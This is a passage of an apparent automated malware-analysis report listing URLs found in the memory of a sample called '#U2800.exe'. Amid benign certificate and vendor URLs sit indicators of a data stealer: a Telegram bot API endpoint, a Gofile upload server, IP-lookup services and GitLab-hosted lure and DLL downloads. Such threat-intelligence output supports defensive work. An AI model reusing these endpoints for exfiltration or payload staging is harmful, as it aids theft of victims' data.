      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342785F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com:443/
      Source: #U2800.exe, 00000000.00000002.1977175799.00000234278CD000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342783F000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427854000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234278C1000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427882000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342785F000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234278A2000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234278B5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234278D4000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342789B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://google.com:443/
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/0
      Source: #U2800.exe, 00000000.00000002.1979563473.0000023429C52000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1979563473.0000023429C3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ip-api.com/json/y
      Source: #U2800.exe, 00000000.00000002.1979563473.0000023429C52000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1979563473.0000023429C3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427A39000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427C1B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
      Source: #U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.m%
      Source: #U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
      Source: #U2800.exe, 00000000.00000003.1693296861.00000274BB8CA000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB8CA000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1706934785.00000274BB8CA000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8CA000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: #U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micros9
      Source: #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
      Source: #U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.oU
      Source: #U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980199503.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1936536459.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlf
      Source: #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlforma
      Source: #U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformaY
      Source: #U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats
      Source: #U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980448152.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692876420.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB8B7000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1975299928.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1914309597.00000274BB8B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats.
      Source: #U2800.exe, 00000000.00000003.1706934785.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1974960914.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1693296861.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1980199503.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1936536459.00000274BB87B000.00000004.00000020.00020000.00000000.sdmp, #U2800.exe, 00000000.00000003.1692653842.00000274BB87B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlfrg/markup-compatibility/2006
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/0
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Y
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid0
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: #U2800.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.micro
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/0
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/i
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342796D000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234279C7000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.00000234279FB000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427A39000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com:443/
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com:443/(
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl&
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com/&ec=GAZA
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
      Source: #U2800.exeString found in binary or memory: https://aka.ms/binaryformatter
      Source: #U2800.exeString found in binary or memory: https://aka.ms/dotnet-illink/com
      Source: #U2800.exeString found in binary or memory: https://aka.ms/dotnet-warnings/
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility0
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
      Source: #U2800.exeString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/servers0
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.gofile.io/serversY
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.org0
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.orgY
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/bot0
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/boti
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp0
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
      Source: #U2800.exeString found in binary or memory: https://github.com/dotnet/efcore
      Source: #U2800.exeString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
      Source: #U2800.exeString found in binary or memory: https://github.com/dotnet/runtime
      Source: #U2800.exeString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
      Source: #U2800.exeString found in binary or memory: https://github.com/ericsink/SQLitePCL.raw
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawX
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/ericsink/SQLitePCL.rawd
      Source: #U2800.exeString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
      Source: #U2800.exeString found in binary or memory: https://github.com/mono/linker/issues/1187
      Source: #U2800.exeString found in binary or memory: https://github.com/mono/linker/issues/1416.
      Source: #U2800.exeString found in binary or memory: https://github.com/mono/linker/issues/1731
      Source: #U2800.exeString found in binary or memory: https://github.com/mono/linker/issues/1895vUsing
      Source: #U2800.exeString found in binary or memory: https://github.com/mono/linker/issues/1906.
      Source: #U2800.exeString found in binary or memory: https://github.com/mono/linker/issues/1981
      Source: #U2800.exeString found in binary or memory: https://github.com/mono/linker/issues/2025
      Source: #U2800.exeString found in binary or memory: https://github.com/mono/linker/pull/2125.
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false0
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?in
      Source: #U2800.exe, 00000000.00000002.1983105073.00007FF7342B3000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://google.com
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342783F000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427854000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.0000023427882000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342785F000.00000004.00001000.00020000.00000000.sdmp, #U2800.exe, 00000000.00000002.1977175799.000002342787E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google.com/
      Source: #U2800.exe, 00000000.00000002.1982750550.00007FF73330D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://google.com0
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/defa
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/eF
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
